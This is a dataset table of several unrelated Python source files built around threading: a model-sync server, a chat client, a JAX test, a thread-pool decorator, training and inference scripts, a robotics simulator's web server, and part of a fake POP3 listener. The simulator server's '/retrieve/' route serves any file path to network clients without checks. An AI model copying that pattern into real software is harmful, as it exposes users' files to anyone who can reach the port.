source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
server.py
|
import io
import logging
import time
from threading import Lock, Thread
import msgpack
import torch
import zmq
from ptgnn.baseneuralmodel import AbstractNeuralModel
from torch import nn
from .data import ModelSyncData
LOGGER = logging.getLogger(__name__)
class ModelSyncServer:
"""A server storing the latest model and parameters."""
def __init__(self, address: str, model: AbstractNeuralModel, neural_net: nn.Module):
self.__server_address = address
self.__sync_lock = Lock()
self.__current_model_version = time.time()
self.__serialized_model = self.__serialize_model(model, neural_net)
self.__update_nn_params(neural_net)
self.__thread = Thread(target=self.serve, daemon=True, name="model_sync_server")
self.__thread.start()
def __serialize_model(self, model, neural_net) -> bytes:
with io.BytesIO() as sb:
torch.save((model, neural_net), f=sb)
sb.seek(0)
return sb.read()
def update_parameters(self, neural_net: nn.Module) -> None:
with self.__sync_lock:
self.__update_nn_params(neural_net)
def __update_nn_params(self, neural_net: nn.Module):
with io.BytesIO() as sb:
torch.save(neural_net.state_dict(), f=sb)
sb.seek(0)
self.__serialized_params = sb.read()
self.__current_param_version = time.time()
def serve(self):
"""The thread responding to updates."""
context = zmq.Context.instance()
socket = context.socket(zmq.REP)
socket.bind(self.__server_address)
while True:
r_bytes = socket.recv()
client_model_version, client_param_version = msgpack.loads(r_bytes)
with self.__sync_lock:
if client_model_version < self.__current_model_version:
model_update = self.__serialized_model
else:
model_update = None
if (
client_model_version < self.__current_model_version
or client_param_version < self.__current_param_version
):
param_update = self.__serialized_params
else:
param_update = None
returned_data = ModelSyncData(
model_update, self.__current_model_version, param_update, self.__current_param_version
)
socket.send(msgpack.dumps(returned_data))
LOGGER.info("Responded to model update request.")
|
main.py
|
#!/usr/bin/env pybricks-micropython
from threading import Thread
from ev3_d4 import EV3D4
ev3_d4 = EV3D4()
Thread(target=ev3_d4.color_sensor_loop).start()
Thread(target=ev3_d4.touch_sensor_loop).start()
ev3_d4.main_switch_loop()
|
client.py
|
import socket
import threading
import tkinter
# -- tkinter による GUI の初期化
root = tkinter.Tk()
root.title("nayutari chat")
root.geometry("400x300")
scrl_frame = tkinter.Frame(root)
scrl_frame.pack()
listbox = tkinter.Listbox(scrl_frame, width=40, height=15)
listbox.pack(side=tkinter.LEFT)
scroll_bar = tkinter.Scrollbar(scrl_frame, command=listbox.yview)
scroll_bar.pack(side=tkinter.RIGHT, fill=tkinter.Y)
listbox.config(yscrollcommand=scroll_bar.set)
input_frame = tkinter.Frame(root)
input_frame.pack()
textbox = tkinter.Entry(input_frame)
textbox.pack(side=tkinter.LEFT)
button = tkinter.Button(input_frame, text="send")
button.pack(side=tkinter.RIGHT)
# データ受信時のコールバック関数
def on_recv_data(data):
listbox.insert(tkinter.END, data)
listbox.yview_moveto(1)
# -- 通信まわりの初期化
IPADDR = "127.0.0.1"
PORT = 49152
sock = socket.socket(socket.AF_INET)
sock.connect((IPADDR, PORT))
def recv_loop(sock, on_recv_func):
while True:
try:
data = sock.recv(1024)
if data == b"":
break
# 受信コールバック呼び出し
on_recv_func(data.decode("utf-8"))
except ConnectionResetError:
break
sock.shutdown(socket.SHUT_RDWR)
sock.close()
thread = threading.Thread(target=recv_loop, args=(sock, on_recv_data))
thread.start()
# 送信ボタンクリック時のコールバック
def on_send_click(sock):
data = textbox.get()
sock.send(data.encode("utf-8"))
textbox.delete(0, tkinter.END)
button.configure(command=lambda:on_send_click(sock))
root.mainloop()
sock.shutdown(socket.SHUT_RDWR)
sock.close()
|
infeed_test.py
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import threading
from absl.testing import absltest
import jax
from jax import lax, numpy as np
from jax.config import config
from jax.lib import xla_client
import jax.test_util
import numpy as onp
config.parse_flags_with_absl()
FLAGS = config.FLAGS
class InfeedTest(jax.test_util.JaxTestCase):
def testInfeed(self):
@jax.jit
def f(x):
token = lax.create_token(x)
(y,), token = lax.infeed(
token, shape=(jax.ShapedArray((3, 4), np.float32),))
(z,), _ = lax.infeed(
token, shape=(jax.ShapedArray((3, 1, 1), np.float32),))
return x + y + z
x = onp.float32(1.5)
y = onp.reshape(onp.arange(12, dtype=onp.float32), (3, 4)) # onp.random.randn(3, 4).astype(onp.float32)
z = onp.random.randn(3, 1, 1).astype(onp.float32)
xla_client.transfer_to_infeed((y,))
xla_client.transfer_to_infeed((z,))
self.assertAllClose(f(x), x + y + z, check_dtypes=True)
def testInfeedThenOutfeed(self):
@jax.jit
def f(x):
token = lax.create_token(x)
y, token = lax.infeed(
token, shape=jax.ShapedArray((3, 4), np.float32))
token = lax.outfeed(token, y + onp.float32(1))
return lax.tie_in(token, x - 1)
x = onp.float32(7.5)
y = onp.random.randn(3, 4).astype(onp.float32)
execution = threading.Thread(target=lambda: f(x))
execution.start()
xla_client.transfer_to_infeed((y,))
out, = xla_client.transfer_from_outfeed(xla_client.shape_from_pyval((y,)))
execution.join()
self.assertAllClose(out, y + onp.float32(1), check_dtypes=True)
def testInfeedThenOutfeedInALoop(self):
def doubler(_, token):
y, token = lax.infeed(
token, shape=jax.ShapedArray((3, 4), np.float32))
return lax.outfeed(token, y * onp.float32(2))
@jax.jit
def f(n):
token = lax.create_token(n)
token = lax.fori_loop(0, n, doubler, token)
return lax.tie_in(token, n)
n = 10
execution = threading.Thread(target=lambda: f(n))
execution.start()
for _ in range(n):
x = onp.random.randn(3, 4).astype(onp.float32)
xla_client.transfer_to_infeed((x,))
y, = xla_client.transfer_from_outfeed(xla_client.shape_from_pyval((x,)))
self.assertAllClose(y, x * onp.float32(2), check_dtypes=True)
execution.join()
if __name__ == '__main__':
absltest.main()
|
py_vthread.py
|
class pool:
import time,queue,traceback,builtins,functools
from threading import Thread,RLock,current_thread,main_thread
orig_func = {}
_org_print = print
lock = RLock()
class KillThreadParams(Exception): pass
_monitor = None
_monitor_run_num = {}
_pool_queue = {}
_pool_func_num = {}
def __init__(self,pool_num=None,gqueue='v',monitor=True):
if gqueue not in self._pool_queue:
self._pool_queue[gqueue] = pool.queue.Queue()
self._pool = self._pool_queue[gqueue]
pool._patch_print()
if monitor: self.main_monitor()
if gqueue not in self._monitor_run_num:
self._monitor_run_num[gqueue] = pool.queue.Queue()
num = self._auto_pool_num(pool_num)
if gqueue not in self._pool_func_num:
self._pool_func_num[gqueue] = num
self._run(num,gqueue)
else:
if pool_num is not None:
self.change_thread_num(num,gqueue)
def __call__(self,func):
pool.orig_func[func.__name__] = func
@pool.functools.wraps(func)
def _run_threads(*args,**kw): self._pool.put((func,args,kw))
return _run_threads
@classmethod
def change_thread_num(self,num,gqueue='v'):
if gqueue in self._pool_func_num:
x = self._pool_func_num[gqueue] - num
if x < 0: self._run(abs(x),gqueue)
if x > 0: [self._pool_queue[gqueue].put(self.KillThreadParams) for _ in range(abs(x))]
self._pool_func_num[gqueue] = num
@classmethod
def main_monitor(self):
def _func():
while True:
pool.time.sleep(.25)
if not pool.main_thread().isAlive() and all(map(lambda i:i.empty(),self._monitor_run_num.values())):
self.close_all()
break
if not self._monitor:
self._monitor = pool.Thread(target=_func,name="MainMonitor")
self._monitor.start()
@classmethod
def close_by_gqueue(self,gqueue='v'): self.change_thread_num(0,gqueue)
@classmethod
def close_all(self):
for i in self._pool_func_num: self.change_thread_num(0,i)
@classmethod
def wait(self, gqueue='v'):
while self.check_stop(gqueue): pool.time.sleep(.25)
@classmethod
def check_stop(self, gqueue='v'):
return self._monitor_run_num[gqueue].qsize() or self._pool_queue[gqueue].qsize()
@staticmethod
def atom(func):
def _atom(*arg,**kw):
with pool.lock: return func(*arg,**kw)
return _atom
@staticmethod
def _patch_print(): pool.builtins.print = pool._new_print
@staticmethod
def _new_print(*arg,**kw):
with pool.lock: pool._org_print("[{}]".format(pool.current_thread().getName().center(13)),*arg,**kw)
@staticmethod
def _auto_pool_num(num):
if not num:
try:
from multiprocessing import cpu_count
num = cpu_count()
except:
print("cpu_count error. use default num 4.")
num = 4
return num
@classmethod
def _run(self,num,gqueue):
def _pools_pull():
ct = pool.current_thread()
ct.setName("{}_{}".format(ct.getName(), gqueue))
while True:
v = self._pool_queue[gqueue].get()
if v == self.KillThreadParams: return
try:
func,args,kw = v
self._monitor_run_num[gqueue].put('V')
func(*args,**kw)
except BaseException as e:
print(pool.traceback.format_exc())
finally:
self._monitor_run_num[gqueue].get('V')
for _ in range(num): pool.Thread(target=_pools_pull).start()
if __name__ == '__main__':
# 简化代码版本的 vthread 库(分组线程池装饰器),一行代码即可实现线程池操作
# 以下为使用/测试 “装饰器线程池” 的代码,你可以在正式使用前熟悉一下使用方法
import time, random
# 被 pool 装饰器装饰的函数,正常执行会变成任务提交的功能,
# 会将函数执行的任务提交给线程池进行执行,所以任务提交并不会卡住程序
# 所以需要多线程操作的函数不要写 return 语句,以及尽量使用主线程中的 list 或 queue 来收集执行结果
@pool(10) # 开启线程池组,默认名字为 'v',线程数量为10
def func1(a,b):
rd = random.random(); time.sleep(rd)
print(a+b, '{:.3f}'.format(rd))
@pool(3,gqueue='h') # 开启线程池组,指定名字为 'h',线程数量为3
def func2(a,b,c):
rd = random.random(); time.sleep(rd)
print(a*b*c, 'hhhhhhh', '{:.3f}'.format(rd))
for i in range(30): func1(i,i*i) # 随便丢30个任务查看多任务多线程池执行效果
for i in range(30): func2(i,i+i,3) # 随便丢30个任务查看多任务多线程池执行效果
print('start wait.')
pool.wait() # 等待函数 func1 任务在默认的 gqueue='v' 的“线程池组”里面全部执行完
pool.wait(gqueue='h') # 等待函数 func2 在 gqueue='h' 的“线程池组”里面全部执行完
print('end wait.')
# 另外 print 函数自动变成输入带有线程名字前缀的、带有锁的函数
|
main_gan_L2_regularized_yelp.py
|
import datetime
import numpy as np
import tensorflow as tf
import threading
import os
from ganrl.common.cmd_args import cmd_args
from ganrl.experiment_user_model.data_utils import Dataset
from ganrl.experiment_user_model.utils import UserModelLSTM, UserModelPW
def multithread_compute_vali():
global vali_sum, vali_cnt
vali_sum = [0.0, 0.0, 0.0, 0.0]
vali_cnt = 0
threads = []
for ii in range(cmd_args.num_thread):
thread = threading.Thread(target=vali_eval, args=(1, ii))
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
return vali_sum[0]/vali_cnt, vali_sum[1]/vali_cnt, vali_sum[2]/vali_cnt, vali_sum[3]/vali_cnt
def vali_eval(xx, ii):
global vali_sum, vali_cnt
vali_thread_eval = sess.run([train_loss_min_sum, train_loss_max_sum, train_prec1_sum, train_prec2_sum, train_event_cnt],
feed_dict={user_model.placeholder['clicked_feature']: click_feature_vali[ii],
user_model.placeholder['ut_dispid_feature']: u_t_dispid_feature_vali[ii],
user_model.placeholder['ut_dispid_ut']: np.array(u_t_dispid_split_ut_vali[ii], dtype=np.int64),
user_model.placeholder['ut_dispid']: np.array(u_t_dispid_vali[ii], dtype=np.int64),
user_model.placeholder['ut_clickid']: np.array(u_t_clickid_vali[ii], dtype=np.int64),
user_model.placeholder['ut_clickid_val']: np.ones(len(u_t_clickid_vali[ii]), dtype=np.float32),
user_model.placeholder['click_sublist_index']: np.array(click_sub_index_vali[ii], dtype=np.int64),
user_model.placeholder['ut_dense']: ut_dense_vali[ii],
user_model.placeholder['time']: max_time_vali[ii],
user_model.placeholder['item_size']: news_cnt_short_vali[ii]
})
lock.acquire()
vali_sum[0] += vali_thread_eval[0]
vali_sum[1] += vali_thread_eval[1]
vali_sum[2] += vali_thread_eval[2]
vali_sum[3] += vali_thread_eval[3]
vali_cnt += vali_thread_eval[4]
lock.release()
def multithread_compute_test():
global test_sum, test_cnt
num_sets = cmd_args.num_thread
thread_dist = [[] for _ in range(cmd_args.num_thread)]
for ii in range(num_sets):
thread_dist[ii % cmd_args.num_thread].append(ii)
test_sum = [0.0, 0.0, 0.0, 0.0]
test_cnt = 0
threads = []
for ii in range(cmd_args.num_thread):
thread = threading.Thread(target=test_eval, args=(1, thread_dist[ii]))
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
return test_sum[0]/test_cnt, test_sum[1]/test_cnt, test_sum[2]/test_cnt, test_sum[3]/test_cnt
def test_eval(xx, thread_dist):
global test_sum, test_cnt
test_thread_eval = [0.0, 0.0, 0.0, 0.0]
test_thread_cnt = 0
for ii in thread_dist:
test_set_eval = sess.run([train_loss_min_sum, train_loss_max_sum, train_prec1_sum, train_prec2_sum, train_event_cnt],
feed_dict={user_model.placeholder['clicked_feature']: click_feature_test[ii],
user_model.placeholder['ut_dispid_feature']: u_t_dispid_feature_test[ii],
user_model.placeholder['ut_dispid_ut']: np.array(u_t_dispid_split_ut_test[ii], dtype=np.int64),
user_model.placeholder['ut_dispid']: np.array(u_t_dispid_test[ii], dtype=np.int64),
user_model.placeholder['ut_clickid']: np.array(u_t_clickid_test[ii], dtype=np.int64),
user_model.placeholder['ut_clickid_val']: np.ones(len(u_t_clickid_test[ii]), dtype=np.float32),
user_model.placeholder['click_sublist_index']: np.array(click_sub_index_test[ii], dtype=np.int64),
user_model.placeholder['ut_dense']: ut_dense_test[ii],
user_model.placeholder['time']: max_time_test[ii],
user_model.placeholder['item_size']: news_cnt_short_test[ii]
})
test_thread_eval[0] += test_set_eval[0]
test_thread_eval[1] += test_set_eval[1]
test_thread_eval[2] += test_set_eval[2]
test_thread_eval[3] += test_set_eval[3]
test_thread_cnt += test_set_eval[4]
lock.acquire()
test_sum[0] += test_thread_eval[0]
test_sum[1] += test_thread_eval[1]
test_sum[2] += test_thread_eval[2]
test_sum[3] += test_thread_eval[3]
test_cnt += test_thread_cnt
lock.release()
lock = threading.Lock()
if __name__ == '__main__':
log_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print("%s, start" % log_time)
dataset = Dataset(cmd_args)
log_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print("%s, start construct graph" % log_time)
# restore pre-trained u function
user_model = UserModelLSTM(dataset.f_dim, cmd_args, dataset.max_disp_size)
user_model.construct_placeholder()
with tf.variable_scope('model', reuse=False):
user_model.construct_computation_graph_u()
saved_path = cmd_args.save_dir+'/'
saver = tf.train.Saver(max_to_keep=None)
sess = tf.Session()
sess.run(tf.variables_initializer(user_model.min_trainable_variables))
best_save_path = os.path.join(saved_path, 'best-pre1')
saver.restore(sess, best_save_path)
# construct policy net
train_min_opt, train_max_opt, train_loss_min, train_loss_max, train_prec1, train_prec2, train_loss_min_sum, \
train_loss_max_sum, train_prec1_sum, train_prec2_sum, train_event_cnt = user_model.construct_computation_graph_policy()
sess.run(tf.initialize_variables(user_model.init_variables))
log_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print("%s, graph completed" % log_time)
batch_size = 100
batch = 100
if cmd_args.dataset == 'lastfm':
batch_size = 10
batch = 10
iterations = cmd_args.num_itrs
# prepare validation data
log_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print("%s, start prepare vali data" % log_time)
vali_thread_user, size_user_vali, max_time_vali, news_cnt_short_vali, u_t_dispid_vali, \
u_t_dispid_split_ut_vali, u_t_dispid_feature_vali, click_feature_vali, click_sub_index_vali, \
u_t_clickid_vali, ut_dense_vali = dataset.prepare_validation_data_L2(cmd_args.num_thread, dataset.vali_user)
log_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print("%s, prepare vali data complete" % log_time)
best_metric = [0.0, 0.0, 0.0, 0.0]
saver = tf.train.Saver(max_to_keep=None)
vali_path = cmd_args.save_dir+'/minmax_L2/'
if not os.path.exists(vali_path):
os.makedirs(vali_path)
for i in range(iterations):
training_user = np.random.choice(len(dataset.train_user), batch, replace=False)
if i == 0:
log_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print("%s, start prepare train data" % log_time)
size_user_tr, max_time_tr, news_cnt_short_tr, u_t_dispid_tr, u_t_dispid_split_ut_tr, \
u_t_dispid_feature_tr, click_feature_tr, click_sub_index_tr, u_t_clickid_tr, ut_dense_tr = dataset.data_process_for_placeholder_L2(training_user)
if i == 0:
log_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print("%s, prepare train data completed" % log_time)
print("%s, start first iteration training" % log_time)
sess.run(train_max_opt, feed_dict={user_model.placeholder['clicked_feature']: click_feature_tr,
user_model.placeholder['ut_dispid_feature']: u_t_dispid_feature_tr,
user_model.placeholder['ut_dispid_ut']: np.array(u_t_dispid_split_ut_tr, dtype=np.int64),
user_model.placeholder['ut_dispid']: np.array(u_t_dispid_tr, dtype=np.int64),
user_model.placeholder['ut_clickid']: np.array(u_t_clickid_tr, dtype=np.int64),
user_model.placeholder['ut_clickid_val']: np.ones(len(u_t_clickid_tr), dtype=np.float32),
user_model.placeholder['click_sublist_index']: np.array(click_sub_index_tr, dtype=np.int64),
user_model.placeholder['ut_dense']: ut_dense_tr,
user_model.placeholder['time']: max_time_tr,
user_model.placeholder['item_size']: news_cnt_short_tr
})
if i == 0:
log_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print("%s, first iteration training complete" % log_time)
if np.mod(i, 100) == 0:
loss_prc = sess.run([train_loss_min, train_loss_max, train_prec1, train_prec2], feed_dict={user_model.placeholder['clicked_feature']: click_feature_tr,
user_model.placeholder['ut_dispid_feature']: u_t_dispid_feature_tr,
user_model.placeholder['ut_dispid_ut']: np.array(u_t_dispid_split_ut_tr, dtype=np.int64),
user_model.placeholder['ut_dispid']: np.array(u_t_dispid_tr, dtype=np.int64),
user_model.placeholder['ut_clickid']: np.array(u_t_clickid_tr, dtype=np.int64),
user_model.placeholder['ut_clickid_val']: np.ones(len(u_t_clickid_tr), dtype=np.float32),
user_model.placeholder['click_sublist_index']: np.array(click_sub_index_tr, dtype=np.int64),
user_model.placeholder['ut_dense']: ut_dense_tr,
user_model.placeholder['time']: max_time_tr,
user_model.placeholder['item_size']: news_cnt_short_tr
})
if i == 0:
log_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print("%s, start first iteration validation" % log_time)
vali_loss_prc = multithread_compute_vali()
if i == 0:
log_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print("%s, first iteration validation complete" % log_time)
log_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print("%s: itr%d, training: %.5f, %.5f, %.5f, %.5f, vali: %.5f, %.5f, %.5f, %.5f" %
(log_time, i, loss_prc[0], loss_prc[1], loss_prc[2], loss_prc[3], vali_loss_prc[0], vali_loss_prc[1], vali_loss_prc[2], vali_loss_prc[3]))
if vali_loss_prc[2] > best_metric[2]:
best_metric[2] = vali_loss_prc[2]
best_save_path = os.path.join(vali_path, 'best-pre1')
best_save_path = saver.save(sess, best_save_path)
if vali_loss_prc[3] > best_metric[3]:
best_metric[3] = vali_loss_prc[3]
best_save_path = os.path.join(vali_path, 'best-pre2')
best_save_path = saver.save(sess, best_save_path)
save_path = os.path.join(vali_path, 'most_recent_iter')
save_path = saver.save(sess, save_path)
# test
log_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print("%s, start prepare test data" % log_time)
test_thread_user, size_user_test, max_time_test, news_cnt_short_test, u_t_dispid_test, \
u_t_dispid_split_ut_test, u_t_dispid_feature_test, click_feature_test, click_sub_index_test, \
u_t_clickid_test, ut_dense_test = dataset.prepare_validation_data_L2(cmd_args.num_thread, dataset.test_user)
log_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print("%s, prepare test data end" % log_time)
best_save_path = os.path.join(vali_path, 'best-pre1')
saver.restore(sess, best_save_path)
test_loss_prc = multithread_compute_test()
vali_loss_prc = multithread_compute_vali()
print("test!!!best-pre1!!!, test: %.5f, vali: %.5f" % (test_loss_prc[2], vali_loss_prc[2]))
best_save_path = os.path.join(vali_path, 'best-pre2')
saver.restore(sess, best_save_path)
test_loss_prc = multithread_compute_test()
vali_loss_prc = multithread_compute_vali()
print("test!!!best-pre2!!!, test: %.5f, vali: %.5f" % (test_loss_prc[3], vali_loss_prc[3]))
|
async_api_multi-threads_multi-requests.py
|
#!/usr/bin/env python3
import cv2
import os
import sys
import time
import numpy as np
from openvino.inference_engine import IENetwork, IEPlugin
from multiprocessing import Process, Queue
import multiprocessing
import threading
import queue
def async_infer_worker(exe_net, request_number, image_queue, input_blob, out_blob):
global start_time
current_request_ids = range(request_number)
next_request_ids = range(request_number, request_number * 2)
done = False
last_batch = -1
infered_images = 0
while True:
buffers = []
for i in range(request_number):
b = image_queue.get()
if type(b) != np.ndarray:
buffers.append(None)
done = True
break
else:
buffers.append(b)
for _request_id in current_request_ids:
if _request_id >= request_number:
if type(buffers[_request_id - request_number]) == np.ndarray:
exe_net.start_async(request_id=_request_id, inputs={input_blob: buffers[_request_id - request_number]})
else:
#print("image at index " + str(_request_id - request_number) + " is none." )
last_batch = _request_id - request_number
break
else:
if type(buffers[_request_id]) == np.ndarray:
exe_net.start_async(request_id=_request_id, inputs={input_blob: buffers[_request_id]})
else:
#print("image at index " + str(_request_id) + " is none." )
last_batch = _request_id
break
for _request_id in next_request_ids:
if exe_net.requests[_request_id].wait(-1) == 0:
res = exe_net.requests[_request_id].outputs[out_blob]
infered_images = infered_images + 1
#print("infer result: label:%f confidence:%f left:%f top:%f right:%f bottom:%f" %(res[0][0][0][1], res[0][0][0][2], res[0][0][0][3], res[0][0][0][4], res[0][0][0][5], res[0][0][0][6]))
duration = time.time() - start_time
print("inferred images: " + str(infered_images) + ", average fps: " + str(infered_images/duration) +"\r", end = '', flush = False)
current_request_ids, next_request_ids = next_request_ids, current_request_ids
for i in range(len(buffers)):
image_queue.task_done()
if done:
break
# 'last_batch' more inference results remain to check
buffer_index = 0
for _request_id in next_request_ids:
if(buffer_index >= last_batch):
break
buffer_index = buffer_index + 1
if exe_net.requests[_request_id].wait(-1) == 0:
res = exe_net.requests[_request_id].outputs[out_blob]
infered_images = infered_images + 1
#print("infer result: label:%f confidence:%f left:%f top:%f right:%f bottom:%f" %(res[0][0][0][1], res[0][0][0][2], res[0][0][0][3], res[0][0][0][4], res[0][0][0][5], res[0][0][0][6]))
duration = time.time() - start_time
print("inferred images: " + str(infered_images) + ", average fps: " + str(infered_images/duration) +"\r", end = '', flush = False)
# for test purpose only
image_number = 200
def preprocess_worker(image_queue, n, c, h, w):
for i in range(1, 1 + image_number):
image = cv2.imread("/opt/intel/computer_vision_sdk/deployment_tools/demo/car.png")
image = cv2.resize(image, (w, h))
image = image.transpose((2, 0, 1))
image = image.reshape((n, c, h, w))
image_queue.put(image)
image_queue.put(None)
start_time = -1
# ./async_api_multi-threads_multi-requests.py <request number>
def main():
global start_time
# specify simutaneous request number in argv
request_number = int(sys.argv[1])
image_queue = queue.Queue(maxsize= request_number*3)
model_dir = os.environ['HOME'] + "/model_downloader/object_detection/common/mobilenet-ssd/caffe/FP16/"
model_xml = model_dir + "mobilenet-ssd.xml"
model_bin = model_dir + "mobilenet-ssd.bin"
plugin = IEPlugin(device="MYRIAD")
net = IENetwork(model=model_xml, weights=model_bin)
input_blob = next(iter(net.inputs))
out_blob = next(iter(net.outputs))
n, c, h, w = net.inputs[input_blob].shape
exec_net = plugin.load(network=net, num_requests=request_number*2)
start_time = time.time()
preprocess_thread = None
preprocess_thread = threading.Thread(target=preprocess_worker, args=(image_queue, n, c, h, w))
preprocess_thread.start()
async_infer_worker(exec_net, request_number, image_queue, input_blob, out_blob)
preprocess_thread.join()
print()
del exec_net
del net
del plugin
if __name__ == '__main__':
sys.exit(main() or 0)
|
SwiftRoute.py
|
#!/usr/bin/env python
"""
@author Jesse Haviland
"""
import swift as sw
import websockets
import asyncio
from threading import Thread
import webbrowser as wb
import json
import http.server
import socketserver
from pathlib import Path
import os
from queue import Empty
from http import HTTPStatus
import urllib
def start_servers(
outq, inq, stop_servers, open_tab=True,
browser=None, dev=False):
# Start our websocket server with a new clean port
socket = Thread(
target=SwiftSocket, args=(outq, inq, stop_servers, ), daemon=True)
socket.start()
socket_port = inq.get()
if not dev:
# Start a http server
server = Thread(
target=SwiftServer,
args=(outq, inq, socket_port, stop_servers, ),
daemon=True)
server.start()
server_port = inq.get()
if open_tab:
if browser is not None:
try:
wb.get(browser).open_new_tab(
'http://localhost:'
+ str(server_port)
+ '/?'
+ str(socket_port))
except wb.Error:
print(
'\nCould not open specified browser, '
'using default instead\n')
wb.open_new_tab(
'http://localhost:'
+ str(server_port)
+ '/?'
+ str(socket_port))
else:
wb.open_new_tab(
'http://localhost:'
+ str(server_port)
+ '/?'
+ str(socket_port))
else:
server = None
wb.get(browser).open_new_tab(
'http://localhost:'
+ str(3000)
+ '/?'
+ str(socket_port))
try:
inq.get(timeout=10)
except Empty:
print('\nCould not connect to the Swift simulator \n')
raise
return socket, server
class SwiftSocket:
def __init__(self, outq, inq, run):
self.run = run
self.outq = outq
self.inq = inq
self.USERS = set()
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
started = False
# port = 8080
# start_server = websockets.serve(self.serve, "localhost", port)
# self.loop.run_until_complete(start_server)
port = 53000
while not started and port < 62000:
try:
start_server = websockets.serve(self.serve, "localhost", port)
self.loop.run_until_complete(start_server)
started = True
except OSError:
port += 1
self.inq.put(port)
self.loop.run_forever()
async def register(self, websocket):
self.USERS.add(websocket)
async def serve(self, websocket, path):
# Initial connection handshake
await(self.register(websocket))
recieved = await websocket.recv()
self.inq.put(recieved)
# Now onto send, recieve cycle
while self.run():
message = await self.producer()
expected = message[0]
msg = message[1]
await websocket.send(json.dumps(msg))
if expected:
recieved = await websocket.recv()
self.inq.put(recieved)
return
async def producer(self):
data = self.outq.get()
return data
class SwiftServer:
def __init__(
self, outq, inq, socket_port, run,
verbose=False, custom_root=None):
server_port = 52000
self.inq = inq
self.run = run
root_dir = Path(sw.__file__).parent / 'out'
print(root_dir)
class MyHttpRequestHandler(http.server.SimpleHTTPRequestHandler):
def __init__(self, *args, **kwargs):
super(MyHttpRequestHandler, self).__init__(*args, directory=str(root_dir), **kwargs)
def log_message(self, format, *args):
if verbose:
http.server.SimpleHTTPRequestHandler.log_message(
self, format, *args)
else:
pass
def do_POST(self):
print(self)
def do_GET(self):
# home = str(Path.home())
if self.path == '/':
self.send_response(301)
self.send_header(
'Location', 'http://localhost:'
+ str(server_port)
+ '/?'
+ str(socket_port))
self.end_headers()
return
elif self.path == '/?' + str(socket_port):
self.path = 'index.html'
elif self.path.startswith("/retrieve/"):
# print(f"Retrieving file: {self.path[10:]}")
self.path = urllib.parse.unquote(self.path[10:])
self.send_file_via_real_path()
return
self.path = Path(self.path).as_posix()
http.server.SimpleHTTPRequestHandler.do_GET(self)
def send_file_via_real_path(self):
try:
f = open(self.path, 'rb')
except OSError:
self.send_error(HTTPStatus.NOT_FOUND, "File not found")
return None
ctype = self.guess_type(self.path)
try:
fs = os.fstat(f.fileno())
self.send_response(HTTPStatus.OK)
self.send_header("Content-type", ctype)
self.send_header("Content-Length", str(fs[6]))
self.send_header("Last-Modified",
self.date_time_string(fs.st_mtime))
self.end_headers()
self.copyfile(f, self.wfile)
finally:
f.close()
Handler = MyHttpRequestHandler
connected = False
while not connected and server_port < 62000:
try:
with socketserver.TCPServer(
("", server_port), Handler) as httpd:
self.inq.put(server_port)
connected = True
# while self.run():
# httpd.handle_request
httpd.serve_forever()
except OSError:
server_port += 1
|
POPListener.py
|
import logging
import sys
import os
import threading
import SocketServer
import ssl
import socket
from . import *
EMAIL = """From: "Bob Example" <bob@example.org>
To: Alice Example <alice@example.com>
Cc: theboss@example.com
Date: Tue, 15 January 2008 16:02:43 -0500
Subject: Test message
Hello Alice.
This is a test message with 5 header fields and 4 lines in the message body.
Your friend,
Bob\r\n"""
class POPListener(object):
# Once the TCP connection has been established, the POP server initiates
# the conversation with +OK message. However, if the client connects
# to a port that is not 110, there is no way for the proxy to know that
# POP is the protocol until the client sends a message.
def taste(self, data, dport):
commands = [ 'QUIT', 'STAT', 'LIST', 'RETR', 'DELE', 'NOOP', 'RSET',
'TOP', 'UIDL', 'USER', 'PASS', 'APOP' ]
confidence = 1 if dport == 110 else 0
data = data.lstrip()
for command in commands:
if data.startswith(command):
confidence += 2
return confidence
def __init__(self,
config,
name='POPListener',
logging_level=logging.INFO,
):
self.logger = logging.getLogger(name)
self.logger.setLevel(logging_level)
self.config = config
self.name = name
self.local_ip = '0.0.0.0'
self.server = None
self.name = 'POP'
self.port = self.config.get('port', 110)
self.logger.info('Starting...')
self.logger.debug('Initialized with config:')
for key, value in config.iteritems():
self.logger.debug(' %10s: %s', key, value)
def start(self):
self.logger.debug('Starting...')
self.server = ThreadedTCPServer((self.local_ip, int(self.config['port'])), ThreadedTCPRequestHandler)
if self.config.get('usessl') == 'Yes':
self.logger.debug('Using SSL socket')
keyfile_path = 'listeners/ssl_utils/privkey.pem'
keyfile_path = ListenerBase.abs_config_path(keyfile_path)
if keyfile_path is None:
self.logger.error('Could not locate %s', keyfile_path)
sys.exit(1)
certfile_path = 'listeners/ssl_utils/server.pem'
certfile_path = ListenerBase.abs_config_path(certfile_path)
if certfile_path is None:
self.logger.error('Could not locate %s', certfile_path)
sys.exit(1)
self.server.socket = ssl.wrap_socket(self.server.socket, keyfile='privkey.pem', certfile='server.pem', server_side=True, ciphers='RSA')
self.server.logger = self.logger
self.server.config = self.config
self.server_thread = threading.Thread(target=self.server.serve_forever)
self.server_thread.daemon = True
self.server_thread.start()
def stop(self):
self.logger.info('Stopping...')
if self.server:
self.server.shutdown()
self.server.server_close()
